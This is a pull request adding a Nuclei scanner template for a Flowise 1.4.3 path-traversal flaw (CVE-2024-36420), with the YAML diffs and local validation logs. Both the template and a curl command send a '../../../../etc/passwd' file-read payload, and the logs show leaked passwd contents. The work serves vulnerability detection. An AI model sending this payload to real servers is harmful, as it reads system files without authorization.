### PR TITLE
Add CVE-2024-36420 template for Flowise arbitrary file read

### DIFF
--- a/http/cves/2024/CVE-2024-36420.yaml
+++ b/http/cves/2024/CVE-2024-36420.yaml
@@ -14,7 +14,7 @@ info:
     - https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982
   classification:
     cve-id: CVE-2024-36420
-    cwe-id: CWE-74
+    cwe-id: CWE-22
     cvss-score: 7.5
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
   metadata:

--- a/http/cves/2024/CVE-2024-36420.yaml
+++ b/http/cves/2024/CVE-2024-36420.yaml
@@ -1,0 +1,51 @@
+id: CVE-2024-36420
+
+info:
+  name: Flowise 1.4.3 - Arbitrary File Read
+  author: fineman999
+  severity: high
+  description: |
+    Flowise version 1.4.3 is vulnerable to arbitrary file read in the
+    /api/v1/openai-assistants-file endpoint due to unsanitized use of the
+    fileName body parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36420
+    - https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
+    - https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982
+  classification:
+    cve-id: CVE-2024-36420
+    cwe-id: CWE-74
+    cvss-score: 7.5
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+  metadata:
+    verified: true
+    vendor: flowiseai
+    product: flowise
+    max-request: 1
+  tags: cve,cve2024,flowise,lfi,traversal,unauth,vuln
+
+http:
+  - raw:
+      - |
+        POST /api/v1/openai-assistants-file HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"fileName":"../../../../etc/passwd"}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - "(?m)^root:[^:]*:0:0:"
+          - "(?m)^daemon:[^:]*:[0-9]+:[0-9]+:"
+
+      - type: word
+        part: header
+        words:
+          - "attachment; filename=passwd"

--- a/http/cves/2024/CVE-2024-36420.yaml
+++ b/http/cves/2024/CVE-2024-36420.yaml
@@ -5,9 +5,11 @@ info:
   author: fineman999
   severity: high
   description: |
-    Flowise version 1.4.3 is vulnerable to arbitrary file read in the
-    /api/v1/openai-assistants-file endpoint due to unsanitized use of the
-    fileName body parameter.
+    Flowise 1.4.3 contains a path traversal caused by lack of sanitization of 'fileName' parameter in /api/v1/openai-assistants-file endpoint in index.ts, letting attackers read arbitrary files, exploit requires attacker to send crafted request.
+  impact: |
+    Attackers can read arbitrary files on the server, potentially exposing sensitive information.
+  remediation: |
+    No known patches available; consider applying input validation and sanitization to 'fileName' parameter or upgrade when patches are released.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-36420
     - https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
@@ -22,7 +24,7 @@ info:
     vendor: flowiseai
     product: flowise
     max-request: 1
-  tags: cve,cve2024,flowise,lfi,traversal,unauth,vuln
+  tags: cve,cve2024,flowise,lfi,unauth,vuln
 
 http:
   - raw:
@@ -35,10 +37,6 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: regex
         part: body
         regex:
@@ -49,3 +47,7 @@ http:
         part: header
         words:
           - "attachment; filename=passwd"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added `CVE-2024-36420` template for Flowise arbitrary file read.
- Vulnerable endpoint: `/api/v1/openai-assistants-file`
- Vulnerable parameter: `fileName`
- Vulnerable tested version: `flowiseai/flowise:1.4.3`
- Newer tested version: `flowiseai/flowise:3.1.2`
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  - https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
  - https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against a local Docker reproduction lab.

Local validation target files:
- Public lab repo: https://github.com/fineman999/POC_CVE-2024-36420
- `docker-compose.yml`
- `docker-compose.latest.yml`
- `README.md`
- `CVE-2024-36420.yaml`

Template validation:

```bash
nuclei -duc -validate -t http/cves/2024/CVE-2024-36420.yaml
```

Observed validation result:

```text
[INF] All templates validated successfully
```

Manual request comparison on the vulnerable target:

```bash
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'
```

Observed vulnerable response:

```text
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
```

True-positive validation:

```bash
nuclei -duc -u http://127.0.0.1:3000 -t http/cves/2024/CVE-2024-36420.yaml
```

Observed result on `1.4.3`:

```text
[CVE-2024-36420] [http] [high] http://127.0.0.1:3000/api/v1/openai-assistants-file
[INF] Scan completed in 11.206625ms. 1 matches found.
```

False-positive control against newer `3.1.2`:

```bash
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'
```

Observed newer-version response:

```text
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}
```

Observed nuclei result on `3.1.2`:

```bash
nuclei -duc -u http://127.0.0.1:3000 -t http/cves/2024/CVE-2024-36420.yaml
```

```text
[INF] Scan completed in 16.413625ms. No results found.
```

The detection checks arbitrary file read behavior directly and does not rely on version banners alone.

### Additional References

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

### Notes

- The version gap is acceptable because the claim is limited to observed behavior:
  - vulnerable on `1.4.3`
  - denied on `3.1.2`
- This does not claim the exact fixed version boundary.